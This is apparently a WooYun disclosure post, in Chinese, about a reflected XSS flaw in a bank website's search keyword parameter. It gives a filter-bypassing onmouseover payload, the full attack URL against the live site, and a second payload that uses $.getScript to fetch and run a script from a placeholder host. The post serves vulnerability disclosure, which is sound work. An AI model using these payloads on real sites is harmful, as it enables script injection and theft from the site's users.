WooYun.org

条件所限，不能发图请见谅
当在搜索框中输入一些字符的时候，发现其返回到了页面的诸多地方。有标签中的，也有js中。
但是经过仔细测试，发现这里虽然没有过滤单引号，但是过滤了其他诸如"<>\&#,甚至（）{}以及alert等js部分函数名。对我们闭合语法触发poc造成了一定困难。
仔细挑选后，选择了如下返回点：

<a href="/cs/Satellite?c=Page&amp;cid=1375342064713&amp;pagename=cmbc%2FPage%2FTP_Sousuolayout&amp;rendermode=preview&amp;keyword=aaa&amp;thisPage=1">首页</a>

其中链接地址中的keyword是可控的，并且来自于请求的url中。
在输入框中输入如下内容： aaabbb' onmouseover='window.onerror=prompt;throw 1' b='
(空格要使用url编码，否则会被剔除)
生成如下url：http://www.cmbc.com.cn/cs/Satellite?c=Page&cid=1375342064713&pagename=cmbc%2FPage%2FTP_Sousuolayout&rendermode=preview&keyword=aaabbb%27onmouseover=%27window.onerror=prompt;throw%201%27%20b=%27&thisPage=1
页面返回结果经过浏览器处理后，如下：

<a b="&amp;thisPage=1" onmouseover="window.onerror=prompt;throw 1" href="/cs/Satellite?c=Page&amp;cid=1375342064713&amp;pagename=cmbc%2FPage%2FTP_Sousuolayout&amp;rendermode=preview&amp;keyword=aaabbb">首页</a>

当鼠标指向页面下方时，触发on事件代码执行。
利用：由于页面使用了jquery可以通过如下方式利用

<img src=1 onerror="window.onerror=$.getScript;throw 'https://xxxxx.js'">

PS:已经数不清第几次投稿了，跪求邀请码。如需回扣请将账号直接发至我邮箱- -！